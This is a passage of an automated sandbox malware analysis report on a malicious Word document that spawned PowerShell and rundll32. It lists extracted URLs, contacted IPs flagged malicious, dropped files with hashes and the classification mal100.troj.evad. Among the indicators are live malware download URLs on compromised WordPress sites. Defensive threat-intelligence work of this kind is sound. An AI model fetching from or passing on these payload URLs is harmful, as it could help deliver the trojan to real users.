                              http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                                high
                                http://www.dnie.es/dpc0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.trustcenter.de/guidelines0powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.globaltrust.info0powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                                  high
                                  https://www.cloudflare.com/5xx-error-landingpowershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2087509388.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092846529.0000000002900000.00000002.00000001.sdmpfalse
                                        high
                                        https://www.catcert.net/verarrelpowershell.exe, 00000005.00000002.2086959168.00000000003B9000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.disig.sk/ca0fpowershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.signatur.rtr.at/current.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                                            high
                                            http://www.sk.ee/juur/crl/0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.quovadis.bm0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.firmaprofesional.com0powershell.exe, 00000005.00000002.2086923820.0000000000373000.00000004.00000020.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://www.netlock.net/docspowershell.exe, 00000005.00000003.2086421803.000000001D329000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmpfalse
                                                high
                                                http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000005.00000002.2096244552.000000001D307000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpfalse
                                                    high
                                                    https://jflmktg.wpcomstaging.com/wp-content/AK/powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://jflmktg.wpcomstapowershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://ocsp.entrust.net03powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://shop.nowfal.devpowershell.exe, 00000005.00000002.2092147081.0000000003B6A000.00000004.00000001.sdmptrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.acabogacia.org0powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.valicert.powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://crl.securetrust.com/STCA.crl0powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.icra.org/vocabulary/.powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                                      high
                                                      http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpfalse
                                                        high
                                                        http://www.quovadisglobal.com/cps0powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://investor.msn.com/powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.valicert.com/1powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000005.00000003.2086160129.000000001D2EB000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://www.%s.comPApowershell.exe, 00000005.00000002.2087509388.0000000002390000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2092846529.0000000002900000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              low
                                                              http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown

                                                              Contacted IPs

                                                              Public

                                                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                              104.21.88.166 | unknown | United States | | 13335 | CLOUDFLARENETUS | true
                                                              192.0.78.20 | unknown | United States | | 2635 | AUTOMATTICUS | true
                                                              45.138.97.75 | unknown | Germany | | 9009 | M247GB | true
                                                              212.227.200.73 | unknown | Germany | | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
                                                              172.217.6.174 | unknown | United States | | 15169 | GOOGLEUS | true

                                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344134
Start date: 26.01.2021
Start time: 06:54:05
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 19m 12s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: N00048481397007.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • HDC enabled
                                                              • GSI enabled (VBA)
                                                              • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@38/12@6/5
                                                              EGA Information:
                                                              • Successful, ratio: 93.3%
                                                              HDC Information:
                                                              • Successful, ratio: 8.4% (good quality ratio 8%)
                                                              • Quality average: 71.9%
                                                              • Quality standard deviation: 25.3%
                                                              HCA Information:
                                                              • Successful, ratio: 57%
                                                              • Number of executed functions: 132
                                                              • Number of non-executed functions: 255
                                                              Cookbook Comments:
                                                              • Adjust boot time
                                                              • Enable AMSI
                                                              • Found application associated with file extension: .doc
                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                              • Found warning dialog
                                                              • Click Ok
                                                              • Attach to Office via COM
                                                              • Scroll down
                                                              • Close Viewer
                                                              Warnings:
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                              • Excluded IPs from analysis (whitelisted): 67.26.83.254, 8.253.204.120, 8.248.139.254, 8.253.204.249, 8.241.11.254, 67.26.73.254, 67.27.158.126, 8.241.9.126, 8.241.9.254
                                                              • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                              • Execution Graph export aborted for target powershell.exe, PID 2584 because it is empty
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                              Simulations

                                                              Behavior and APIs

Time | Type | Description
06:54:34 | API Interceptor | 1x Sleep call for process: msg.exe modified
06:54:35 | API Interceptor | 48x Sleep call for process: powershell.exe modified
06:54:42 | API Interceptor | 261x Sleep call for process: rundll32.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs


                                                                    Domains


                                                                    ASN


                                                                    JA3 Fingerprints


                                                                    Dropped Files

                                                                    No context

                                                                    Created / dropped Files

                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                    Category:dropped
                                                                    Size (bytes):58936
                                                                    Entropy (8bit):7.994797855729196
                                                                    Encrypted:true
                                                                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                    MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):326
                                                                    Entropy (8bit):3.1059794776750005
                                                                    Encrypted:false
                                                                    SSDEEP:6:kKXfwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:P0kPlE99SNxAhUegeT2
                                                                    MD5:AF3E40C6143B7C1580CABC4D833264A5
                                                                    SHA1:C530EF975CA825312D025A674A655B101C7577CF
                                                                    SHA-256:9E85079D9122E2D0EFBF1A9EC220C04052100EE4033309FB960A729A2B1D7A54
                                                                    SHA-512:8CF7932992F0EC435DAEFB9A51C256DFA179308B6D8E988DB2BB96E5510BF999AB197833EB4CCF1460C504B8220417CB22F207352A35A89D8125711C4EB0E52A
                                                                    Malicious:false
                                                                    Preview: p...... ........l..+....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D521D9E8-B04E-4308-BA86-6463BC7125FE}.tmp
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1536
                                                                    Entropy (8bit):1.3568273340340575
                                                                    Encrypted:false
                                                                    SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1MzC8/
                                                                    MD5:DEA88B2A7555DC902827FB65966666D2
                                                                    SHA1:EDBA915F1F013DCE52DA61F26806544F7868C5AB
                                                                    SHA-256:72611C20007C7998A1C1518DD9E1348B20159C4073B10817D14E386BEC583186
                                                                    SHA-512:839BB55E4FDA7AF156C768399D7E5A126C14F2204CFF36C78E014ABFF34858755D0B0B1A0BD50A2C3456132FBE8BBBB6914B3F8E14EEB1DB882DDFCB884EE6D6
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5018462-B174-499E-B3BD-E7523F18DF93}.tmp
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):1024
                                                                    Entropy (8bit):0.05390218305374581
                                                                    Encrypted:false
                                                                    SSDEEP:3:ol3lYdn:4Wn
                                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Temp\CabF6EE.tmp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                    Category:dropped
                                                                    Size (bytes):58936
                                                                    Entropy (8bit):7.994797855729196
                                                                    Encrypted:true
                                                                    SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                                    MD5:E4F1E21910443409E81E5B55DC8DE774
                                                                    SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                                    SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                                    SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Local\Temp\TarF6EF.tmp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):152533
                                                                    Entropy (8bit):6.31602258454967
                                                                    Encrypted:false
                                                                    SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                                    MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                                    SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                                    SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                                    SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\N00048481397007.LNK
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:11 2020, mtime=Wed Aug 26 14:08:11 2020, atime=Tue Jan 26 13:54:32 2021, length=143360, window=hide
                                                                    Category:dropped
                                                                    Size (bytes):2078
                                                                    Entropy (8bit):4.499545182329711
                                                                    Encrypted:false
                                                                    SSDEEP:48:83n/XT+NnBJqCRMQh23n/XT+NnBJqCRMQ/:8X/X6NnBUCRMQh2X/X6NnBUCRMQ/
                                                                    MD5:4DC93C5BDC369B881D1F1C1B5D773F3D
                                                                    SHA1:9685FCA992A27B86432271969DCA9B566A7E22FA
                                                                    SHA-256:5EDA56B24F00F7C7DD8468CCE528CB31956225F9508748AF60D74C02DFA44E0E
                                                                    SHA-512:638E9A052AB71E9E7B1622EF05F3210EEDC13253D8228BD900087BC37EE72F1F3E288390C69E5E11C3BE2B5FA50B3BA4396AA1FFC81E9956C27FB69DF2033CF8
                                                                    Malicious:false
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):83
                                                                    Entropy (8bit):3.9220124011386437
                                                                    Encrypted:false
                                                                    SSDEEP:3:M1BMWcmGUz/uWcmGUmX1BMWcmGUv:MAumEg
                                                                    MD5:9177EA48FE0784FEE174EA5A993CB67D
                                                                    SHA1:E16A37EFB21A72B380AECB88FEDF16CCA6D2D212
                                                                    SHA-256:E2AD03A823781A81F8F3BC613947C8F8065A4E4CC4EB08431CE74839F35DEC93
                                                                    SHA-512:7CBCB55B15FF3CF9C05BF225A7C6291F82F1E7AB0DF3F77DA89A273CC7B2DD98E43A99C727F5D02B8BFD19C786B4072154C92F4AAAD2B74683D357CB25FB974D
                                                                    Malicious:false
                                                                    Preview: [doc]..N00048481397007.LNK=0..N00048481397007.LNK=0..[doc]..N00048481397007.LNK=0..
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):2.431160061181642
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                    Malicious:false
                                                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DXR0C5WZELQL0TY5LBY1.temp
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):8016
                                                                    Entropy (8bit):3.5841938963145714
                                                                    Encrypted:false
                                                                    SSDEEP:96:chQCsMqbqvsqvJCwovMz8hQCsMqbqvsEHyqvJCworxMz1PYkHAMf8IxlUVVMIu:cy+ovMz8yWHnorxMz1uMf8IEMIu
                                                                    MD5:FAB5F778AFC277EE927814807F840251
                                                                    SHA1:C899512AF16B005203AA3120262778B57C93BFB4
                                                                    SHA-256:B66203C08906A30BF9D03B449AD542DA8E1A731188C2CDF3DA597359376580AF
                                                                    SHA-512:8CF645A5A445BFDEC39F89A9F0C3C5F0CC97FAE806D5AC300D18787C01517E19076D5066933429161B6DE867FB0B75813C2898A62558E723C86CACF1A5777157
                                                                    Malicious:false
                                                                    C:\Users\user\Desktop\~$0048481397007.doc
                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):162
                                                                    Entropy (8bit):2.431160061181642
                                                                    Encrypted:false
                                                                    SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                    MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                    SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                    SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                    SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                    Malicious:false
                                                                    Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                    C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):628447
                                                                    Entropy (8bit):6.912286773857833
                                                                    Encrypted:false
                                                                    SSDEEP:12288:8YzchQVZnkmt/70MWugxPJZFpf0c1pHibdJxUR9rNXZL4:n4KV5Hpt8bZHLGnM919
                                                                    MD5:8E90CD714E2817279BF79A2671612850
                                                                    SHA1:9D9E37927CC21F980624369B73942426D6C75F88
                                                                    SHA-256:F409888E8DD33D184E1499AF1FF09AD95009C3A0CF0D6414403ACDD92455951B
                                                                    SHA-512:1E47E90EA18713F0C641B75A94E14F79CABD6B5C57BB23702A26EE0B05BEC68EA54EC4ECAD7DCCF59AAEF4315D501D2F43FDF354C4D1FE5BEF14356A777174CE
                                                                    Malicious:true
                                                                    Preview: <!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site | Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->.<style type="text/css">body{margin:0;padding:0}</style>...

                                                                    Static File Info

                                                                    General

